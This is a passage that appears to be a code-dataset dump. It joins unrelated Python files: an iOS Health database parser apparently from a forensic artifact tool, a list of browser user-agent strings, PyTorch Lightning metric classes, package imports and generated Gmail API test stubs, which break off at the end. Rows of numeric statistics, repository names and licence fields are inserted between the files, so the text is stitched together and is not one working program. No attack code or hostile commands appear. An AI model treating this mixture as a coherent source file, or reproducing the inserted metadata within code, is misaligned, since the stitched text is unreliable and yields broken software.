                ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
            LEFT OUTER JOIN
                CORRELATIONS
                ON SAMPLES.DATA_ID = CORRELATIONS.OBJECT
            WHERE
                SAMPLES.DATA_TYPE = 8
            """
        )

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        data_list = []
        if usageentries == 0:
            logfunc('No data available in Distance')
        else:
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4], row[5]))

            description = ''
            report = ArtifactHtmlReport('Health Distance')
            report.start_artifact_report(report_folder, 'Distance', description)
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'Distance in Meters', 'Distance in Feet', 'Time in Seconds', 'Samples Table ID')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Distance'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Distance'
            timeline(report_folder, tlactivity, data_list)
    if version.parse(iOSversion) >= version.parse("12"):
        cursor = db.cursor()
        cursor.execute(
            """
            SELECT
                DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
                DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
                METADATA_VALUES.NUMERICAL_VALUE AS "ECG AVERAGE HEARTRATE",
                (SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS"
            FROM
                SAMPLES
            LEFT OUTER JOIN
                METADATA_VALUES
                ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
            LEFT OUTER JOIN
                METADATA_KEYS
                ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
            LEFT OUTER JOIN
                WORKOUTS
                ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
            WHERE
                KEY IS "_HKPrivateMetadataKeyElectrocardiogramHeartRate"
            """
        )

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        data_list = []
        if usageentries == 0:
            logfunc('No data available in ECG Avg. Heart Rate')
        else:
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3]))

            description = ''
            report = ArtifactHtmlReport('Health ECG Avg Heart Rate')
            report.start_artifact_report(report_folder, 'ECG Avg. Heart Rate', description)
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'ECG Avg. Heart Rate', 'Time in Seconds')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health ECG Avg Heart Rate'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health ECG Avg Heart Rate'
            timeline(report_folder, tlactivity, data_list)
    if version.parse(iOSversion) >= version.parse("12"):
        cursor = db.cursor()
        cursor.execute('''
        SELECT
            DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
            DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
            METADATA_VALUES.NUMERICAL_VALUE/100.00 AS "ELEVATION (METERS)",
            (METADATA_VALUES.NUMERICAL_VALUE/100.00)*3.28084 AS "ELEVATION (FEET)",
            CASE WORKOUTS.ACTIVITY_TYPE
                WHEN 63 THEN "HIGH INTENSITY INTERVAL TRAINING (HIIT)"
                WHEN 37 THEN "INDOOR / OUTDOOR RUN"
                WHEN 3000 THEN "OTHER"
                WHEN 52 THEN "INDOOR / OUTDOOR WALK"
                WHEN 20 THEN "FUNCTIONAL TRAINING"
                WHEN 13 THEN "INDOOR CYCLE"
                WHEN 16 THEN "ELLIPTICAL"
                WHEN 35 THEN "ROWER"
                ELSE "UNKNOWN" || "-" || WORKOUTS.ACTIVITY_TYPE
            END "WORKOUT TYPE",
            WORKOUTS.DURATION / 60.00 AS "DURATION (IN MINUTES)",
            WORKOUTS.TOTAL_ENERGY_BURNED AS "CALORIES BURNED",
            WORKOUTS.TOTAL_DISTANCE AS "DISTANCE IN KILOMETERS",
            WORKOUTS.TOTAL_DISTANCE*0.621371 AS "DISTANCE IN MILES",
            WORKOUTS.TOTAL_BASAL_ENERGY_BURNED AS "TOTAL BASAL ENERGY BURNED",
            CASE WORKOUTS.GOAL_TYPE
                WHEN 2 THEN "MINUTES"
                WHEN 0 THEN "OPEN"
            END "GOAL TYPE",
            WORKOUTS.GOAL AS "GOAL",
            WORKOUTS.TOTAL_FLIGHTS_CLIMBED AS "FLIGHTS CLIMBED",
            WORKOUTS.TOTAL_W_STEPS AS "STEPS"
        FROM
            SAMPLES
        LEFT OUTER JOIN
            METADATA_VALUES
            ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
        LEFT OUTER JOIN
            METADATA_KEYS
            ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
        LEFT OUTER JOIN
            WORKOUTS
            ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
        WHERE
            WORKOUTS.ACTIVITY_TYPE NOT NULL AND (KEY IS "_HKPrivateWorkoutElevationAscendedQuantity" OR KEY IS "HKElevationAscended")
        ''')

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        if usageentries > 0:
            data_list = []
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11], row[12], row[13]))

            report = ArtifactHtmlReport('Health Workout Indoor Elevation')
            report.start_artifact_report(report_folder, 'Workout Indoor Elevation')
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'Elevation in Meters', 'Elevation in Feet', 'Workout Type', 'Duration in Min.', 'Calories Burned', 'Distance in KM', 'Distance in Miles', 'Total Basal Energy Burned', 'Goal Type', 'Goal', 'Flights Climbed', 'Steps')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Workout Indoor Elevation'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Workout Indoor Elevation'
            timeline(report_folder, tlactivity, data_list)
        else:
            logfunc('No data available in Workout Indoor Elevation')
    if version.parse(iOSversion) >= version.parse("9"):
        cursor = db.cursor()
        cursor.execute(
            """
            SELECT
                DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
                DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
                QUANTITY AS "FLIGHTS CLIMBED",
                (SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
                SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
            FROM
                SAMPLES
            LEFT OUTER JOIN
                QUANTITY_SAMPLES
                ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
            WHERE
                SAMPLES.DATA_TYPE = 12
            """
        )

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        data_list = []
        if usageentries == 0:
            logfunc('No data available in Flights Climbed')
        else:
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4]))

            description = ''
            report = ArtifactHtmlReport('Health Flights Climbed')
            report.start_artifact_report(report_folder, 'Flights Climbed', description)
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'Flights Climbed', 'Time in Seconds', 'Samples Table ID')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Flights Climbed'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Flights Climbed'
            timeline(report_folder, tlactivity, data_list)
    if version.parse(iOSversion) >= version.parse("9"):
        cursor = db.cursor()
        cursor.execute(
            """
            SELECT
                DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "DATE",
                ORIGINAL_QUANTITY AS "HEART RATE",
                UNIT_STRINGS.UNIT_STRING AS "UNITS",
                QUANTITY AS "QUANTITY",
                SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
            FROM
                SAMPLES
            LEFT OUTER JOIN
                QUANTITY_SAMPLES
                ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
            LEFT OUTER JOIN
                UNIT_STRINGS
                ON QUANTITY_SAMPLES.ORIGINAL_UNIT = UNIT_STRINGS.ROWID
            WHERE
                SAMPLES.DATA_TYPE = 5
            """
        )

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        data_list = []
        if usageentries == 0:
            logfunc('No data available in Heart Rate')
        else:
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4]))

            description = ''
            report = ArtifactHtmlReport('Health Heart Rate')
            report.start_artifact_report(report_folder, 'Heart Rate', description)
            report.add_script()
            data_headers = ('Date', 'Heart Rate', 'Units', 'Quantity', 'Samples Table ID')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Heart Rate'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Heart Rate'
            timeline(report_folder, tlactivity, data_list)
    if version.parse(iOSversion) >= version.parse("9"):
        cursor = db.cursor()
        cursor.execute('''
        SELECT
            DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
            DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
            QUANTITY AS "STOOD UP",
            (SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
            SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
        FROM
            SAMPLES
        LEFT OUTER JOIN
            QUANTITY_SAMPLES
            ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
        WHERE
            SAMPLES.DATA_TYPE = 75
        ''')

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        if usageentries > 0:
            data_list = []
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4]))

            report = ArtifactHtmlReport('Health Stood Up')
            report.start_artifact_report(report_folder, 'Stood Up')
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'Stood Up', 'Time in Seconds', 'Table ID')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Stood Up'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Stood Up'
            timeline(report_folder, tlactivity, data_list)
        else:
            logfunc('No data available in Stood Up')
    if version.parse(iOSversion) >= version.parse("9"):
        cursor = db.cursor()
        cursor.execute('''
        SELECT
            DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
            DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
            QUANTITY AS "STEPS",
            (SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
            SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
        FROM
            SAMPLES
        LEFT OUTER JOIN
            QUANTITY_SAMPLES
            ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
        WHERE
            SAMPLES.DATA_TYPE = 7
        ''')

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        if usageentries > 0:
            data_list = []
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4]))

            report = ArtifactHtmlReport('Health Steps')
            report.start_artifact_report(report_folder, 'Steps')
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'Steps', 'Time in Seconds', 'Samples Table ID')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Steps'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Steps'
            timeline(report_folder, tlactivity, data_list)
        else:
            logfunc('No data available in Steps')
    if version.parse(iOSversion) >= version.parse("9"):
        cursor = db.cursor()
        cursor.execute('''
        SELECT
            DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "DATE",
            QUANTITY AS "WEIGHT (IN KG)",
            QUANTITY*2.20462 AS "WEIGHT (IN LBS)",
            SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
        FROM
            SAMPLES
        LEFT OUTER JOIN QUANTITY_SAMPLES ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
        WHERE
            SAMPLES.DATA_TYPE = 3
            AND "DATE" IS NOT NULL
        ''')

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        if usageentries > 0:
            data_list = []
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3]))

            report = ArtifactHtmlReport('Health Weight')
            report.start_artifact_report(report_folder, 'Weight')
            report.add_script()
            data_headers = ('Date', 'Weight in KG', 'Weight in LBS', 'Samples Table ID')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Weight'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Weight'
            timeline(report_folder, tlactivity, data_list)
        else:
            logfunc('No data available in Weight')
    if version.parse(iOSversion) >= version.parse("9"):
        cursor = db.cursor()
        cursor.execute('''
        SELECT
            DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
            DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
            CASE WORKOUTS.ACTIVITY_TYPE
                WHEN 63 THEN "HIGH INTENSITY INTERVAL TRAINING (HIIT)"
                WHEN 37 THEN "INDOOR / OUTDOOR RUN"
                WHEN 3000 THEN "OTHER"
                WHEN 52 THEN "INDOOR / OUTDOOR WALK"
                WHEN 20 THEN "FUNCTIONAL TRAINING"
                WHEN 13 THEN "INDOOR CYCLE"
                WHEN 16 THEN "ELLIPTICAL"
                WHEN 35 THEN "ROWER"
                ELSE "UNKNOWN" || "-" || WORKOUTS.ACTIVITY_TYPE
            END "WORKOUT TYPE",
            WORKOUTS.DURATION / 60.00 AS "DURATION (IN MINUTES)",
            WORKOUTS.TOTAL_ENERGY_BURNED AS "CALORIES BURNED",
            WORKOUTS.TOTAL_DISTANCE AS "DISTANCE IN KILOMETERS",
            WORKOUTS.TOTAL_DISTANCE*0.621371 AS "DISTANCE IN MILES",
            WORKOUTS.TOTAL_BASAL_ENERGY_BURNED AS "TOTAL BASAL ENERGY BURNED",
            CASE WORKOUTS.GOAL_TYPE
                WHEN 2 THEN "MINUTES"
                WHEN 0 THEN "OPEN"
            END "GOAL TYPE",
            WORKOUTS.GOAL AS "GOAL",
            WORKOUTS.TOTAL_FLIGHTS_CLIMBED AS "FLIGHTS CLIMBED",
            WORKOUTS.TOTAL_W_STEPS AS "STEPS"
        FROM
            SAMPLES
        LEFT OUTER JOIN
            METADATA_VALUES
            ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
        LEFT OUTER JOIN
            METADATA_KEYS
            ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
        LEFT OUTER JOIN
            WORKOUTS
            ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
        WHERE
            WORKOUTS.ACTIVITY_TYPE NOT NULL
            AND (KEY IS NULL OR KEY IS "HKIndoorWorkout")
        ''')

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        if usageentries > 0:
            data_list = []
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11]))

            report = ArtifactHtmlReport('Health Workout General')
            report.start_artifact_report(report_folder, 'Workout General')
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'Workout Type', 'Duration in Min.', 'Calories Burned', 'Distance in KM', 'Distance in Miles', 'Total Basal Energy Burned', 'Goal Type', 'Goal', 'Flights Climbed', 'Steps')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Workout General'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Workout General'
            timeline(report_folder, tlactivity, data_list)
        else:
            logfunc('No data available in Workout General')
| 42.129278 | 259 | 0.575181 | 2,429 | 22,160 | 5.079457 | 0.081927 | 0.03242 | 0.028449 | 0.030799 | 0.85111 | 0.849165 | 0.828335 | 0.817637 | 0.805722 | 0.788702 | 0 | 0.027168 | 0.335605 | 22,160 | 525 | 260 | 42.209524 | 0.81084 | 0 | 0 | 0.744361 | 0 | 0 | 0.482416 | 0.076864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002506 | false | 0 | 0.032581 | 0 | 0.035088 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b21be156b78cb4c6c4ebd213b17e965a1c66b85 | 1,314 | py | Python | desktopAgents.py | Joshua-amare/Word-Analyzer | 8985c846d858412ef96d052f99434e891aa22e1c | [
"MIT"
] | null | null | null | desktopAgents.py | Joshua-amare/Word-Analyzer | 8985c846d858412ef96d052f99434e891aa22e1c | [
"MIT"
] | null | null | null | desktopAgents.py | Joshua-amare/Word-Analyzer | 8985c846d858412ef96d052f99434e891aa22e1c | [
"MIT"
] | null | null | null | desktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
                  'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
                  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
                  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
                  'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
                  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
                  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
                  'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
                  'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
                  'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']
| 119.454545 | 141 | 0.636986 | 228 | 1,314 | 3.640351 | 0.179825 | 0.096386 | 0.108434 | 0.20241 | 0.895181 | 0.895181 | 0.895181 | 0.895181 | 0.895181 | 0.895181 | 0 | 0.244681 | 0.21309 | 1,314 | 10 | 142 | 131.4 | 0.558027 | 0 | 0 | 0 | 0 | 1 | 0.83819 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
3b6bf45dbe25c84f022b581b3c780d4eaa5faf61 | 5,947 | py | Python | model/metrics.py | deep-spin/explainable-qe-shared-task | da517a9a76f6dc0c68113e2d6be830f5b57726a7 | [
"MIT"
] | 5 | 2021-10-10T17:40:05.000Z | 2022-03-08T08:52:10.000Z | model/metrics.py | deep-spin/explainable-qe-shared-task | da517a9a76f6dc0c68113e2d6be830f5b57726a7 | [
"MIT"
] | null | null | null | model/metrics.py | deep-spin/explainable-qe-shared-task | da517a9a76f6dc0c68113e2d6be830f5b57726a7 | [
"MIT"
] | 1 | 2022-03-08T08:52:12.000Z | 2022-03-08T08:52:12.000Z | # -*- coding: utf-8 -*-
import warnings
import torch
from pytorch_lightning.metrics import Metric
from scipy.stats import kendalltau, pearsonr
from sklearn.metrics import matthews_corrcoef, roc_auc_score, average_precision_score
class Kendall(Metric):
    def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
        super().__init__(dist_sync_on_step=dist_sync_on_step)
        self.add_state("predictions", default=[], dist_reduce_fx="sum")
        self.add_state("scores", default=[], dist_reduce_fx="sum")

    def update(self, predictions: torch.Tensor, scores: torch.Tensor):
        assert predictions.shape == scores.shape
        self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
        self.scores += scores.cpu().tolist() if scores.is_cuda else scores.tolist()

    def compute(self):
        with warnings.catch_warnings():
            # this will suppress all warnings in this block
            warnings.simplefilter("ignore")
            if len(self.predictions) == 0:
                self.predictions.append(0)
                self.scores.append(0)
            if len(self.predictions) == 1:
                self.predictions.append(0)
                self.scores.append(0)
            return torch.tensor(kendalltau(self.predictions, self.scores)[0], dtype=torch.float32)
class Pearson(Metric):
    def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
        super().__init__(dist_sync_on_step=dist_sync_on_step)
        self.add_state("predictions", default=[], dist_reduce_fx="sum")
        self.add_state("scores", default=[], dist_reduce_fx="sum")

    def update(self, predictions: torch.Tensor, scores: torch.Tensor):
        assert predictions.shape == scores.shape
        self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
        self.scores += scores.cpu().tolist() if scores.is_cuda else scores.tolist()

    def compute(self):
        with warnings.catch_warnings():
            # this will suppress all warnings in this block
            warnings.simplefilter("ignore")
            if len(self.predictions) == 0:
                self.predictions.append(0)
                self.scores.append(0)
            if len(self.predictions) == 1:
                self.predictions.append(0)
                self.scores.append(0)
            return torch.tensor(pearsonr(self.predictions, self.scores)[0], dtype=torch.float32)
class Accuracy(Metric):
    def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
        super().__init__(dist_sync_on_step=dist_sync_on_step)
        self.add_state("predictions", default=[], dist_reduce_fx="sum")
        self.add_state("scores", default=[], dist_reduce_fx="sum")

    def update(self, predictions: torch.Tensor, scores: torch.Tensor):
        self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
        self.scores += scores.cpu().tolist() if scores.is_cuda else scores.tolist()

    def compute(self):
        with warnings.catch_warnings():
            # this will suppress all warnings in this block
            warnings.simplefilter("ignore")
            return torch.mean((torch.tensor(self.predictions) == torch.tensor(self.scores)).float())
class MCC(Metric):
    def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
        super().__init__(dist_sync_on_step=dist_sync_on_step)
        self.add_state("predictions", default=[], dist_reduce_fx="sum")
        self.add_state("scores", default=[], dist_reduce_fx="sum")

    def update(self, predictions: torch.Tensor, scores: torch.Tensor):
        self.predictions += predictions.flatten().cpu().tolist() if predictions.is_cuda else predictions.flatten().tolist()
        self.scores += scores.flatten().cpu().tolist() if scores.is_cuda else scores.flatten().tolist()

    def compute(self):
        with warnings.catch_warnings():
            # this will suppress all warnings in this block
            warnings.simplefilter("ignore")
            return torch.tensor(matthews_corrcoef(self.scores, self.predictions))
class AUC(Metric):
    def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
        super().__init__(dist_sync_on_step=dist_sync_on_step)
        self.add_state("predictions", default=[], dist_reduce_fx="sum")
        self.add_state("scores", default=[], dist_reduce_fx="sum")

    def update(self, predictions: torch.Tensor, scores: torch.Tensor):
        self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
        self.scores += scores.cpu().tolist() if scores.is_cuda else scores.tolist()

    def compute(self):
        with warnings.catch_warnings():
            # this will suppress all warnings in this block
            warnings.simplefilter("ignore")
            try:
                return roc_auc_score(self.scores, self.predictions)
            except ValueError:
                return 0.0
class AveragePrecision(Metric):
    def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
        super().__init__(dist_sync_on_step=dist_sync_on_step)
        self.add_state("predictions", default=[], dist_reduce_fx="sum")
        self.add_state("scores", default=[], dist_reduce_fx="sum")

    def update(self, predictions: torch.Tensor, scores: torch.Tensor):
        self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
        self.scores += scores.cpu().tolist() if scores.is_cuda else scores.tolist()

    def compute(self):
        with warnings.catch_warnings():
            # this will suppress all warnings in this block
            warnings.simplefilter("ignore")
            try:
                return average_precision_score(self.scores, self.predictions)
            except ValueError:
                return 0.0
| 45.746154 | 113 | 0.667563 | 732 | 5,947 | 5.195355 | 0.112022 | 0.102551 | 0.047331 | 0.066263 | 0.893505 | 0.893505 | 0.893505 | 0.893505 | 0.893505 | 0.868262 | 0 | 0.00492 | 0.213889 | 5,947 | 129 | 114 | 46.100775 | 0.808556 | 0.049941 | 0 | 0.804124 | 0 | 0 | 0.03084 | 0 | 0 | 0 | 0 | 0 | 0.020619 | 1 | 0.185567 | false | 0 | 0.051546 | 0 | 0.381443 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b8461f3404bfb6a4ebe6bd089fc29dfa4f247f8 | 214 | py | Python | eprun/__init__.py | stevenkfirth/eprun | 2a580f8ac0b5976cb1bc84328ffb821bd31731e6 | [
"MIT"
] | 5 | 2021-05-22T19:13:13.000Z | 2022-03-07T04:54:08.000Z | eprun/__init__.py | stevenkfirth/eprun | 2a580f8ac0b5976cb1bc84328ffb821bd31731e6 | [
"MIT"
] | null | null | null | eprun/__init__.py | stevenkfirth/eprun | 2a580f8ac0b5976cb1bc84328ffb821bd31731e6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .eprun import runsim
from .eprun import EPEnd
from .eprun import EPErr
from .eprun import EPEso
from .epjson import read_epjson
from .epjson import read_idf
from .epjson import EPJSON
| 21.4 | 31 | 0.766355 | 33 | 214 | 4.909091 | 0.393939 | 0.222222 | 0.37037 | 0.246914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005556 | 0.158879 | 214 | 9 | 32 | 23.777778 | 0.894444 | 0.098131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e80cb4dd7c09a0018cee75e50ec3af240d4d027 | 180 | py | Python | tests/test_examples/imagenet_test/test/simpleAICV/classification/backbones/__init__.py | guohaoyu110/taivision | eb78bd079d98a58dcbc4995e9f04198bc6592e2b | [
"BSD-2-Clause"
] | null | null | null | tests/test_examples/imagenet_test/test/simpleAICV/classification/backbones/__init__.py | guohaoyu110/taivision | eb78bd079d98a58dcbc4995e9f04198bc6592e2b | [
"BSD-2-Clause"
] | null | null | null | tests/test_examples/imagenet_test/test/simpleAICV/classification/backbones/__init__.py | guohaoyu110/taivision | eb78bd079d98a58dcbc4995e9f04198bc6592e2b | [
"BSD-2-Clause"
] | null | null | null | # from .darknet import *
# from .efficientnet import *
# from .regnet import *
# from .repvgg import *
from .resnet import *
# from .resnetforcifar import *
# from .vovnet import * | 25.714286 | 31 | 0.705556 | 21 | 180 | 6.047619 | 0.428571 | 0.472441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183333 | 180 | 7 | 32 | 25.714286 | 0.863946 | 0.811111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d9174550fda9a2e8c5e6513ad82744995bd408b5 | 10,176 | py | Python | test/test_users_api.py | CanopyIQ/gmail_client | 5af519cf6d350f2b2645b85fe9692811f7a9feeb | [
"MIT"
] | null | null | null | test/test_users_api.py | CanopyIQ/gmail_client | 5af519cf6d350f2b2645b85fe9692811f7a9feeb | [
"MIT"
] | null | null | null | test/test_users_api.py | CanopyIQ/gmail_client | 5af519cf6d350f2b2645b85fe9692811f7a9feeb | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Gmail
Access Gmail mailboxes including sending user email.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import gmail_client
from gmail_client.rest import ApiException
from gmail_client.apis.users_api import UsersApi
class TestUsersApi(unittest.TestCase):
    """ UsersApi unit test stubs """

    def setUp(self):
        self.api = gmail_client.apis.users_api.UsersApi()

    def tearDown(self):
        pass
    def test_gmail_users_drafts_create(self):
        """
        Test case for gmail_users_drafts_create
        """
        pass

    def test_gmail_users_drafts_delete(self):
        """
        Test case for gmail_users_drafts_delete
        """
        pass

    def test_gmail_users_drafts_get(self):
        """
        Test case for gmail_users_drafts_get
        """
        pass

    def test_gmail_users_drafts_list(self):
        """
        Test case for gmail_users_drafts_list
        """
        pass

    def test_gmail_users_drafts_send(self):
        """
        Test case for gmail_users_drafts_send
        """
        pass

    def test_gmail_users_drafts_update(self):
        """
        Test case for gmail_users_drafts_update
        """
        pass

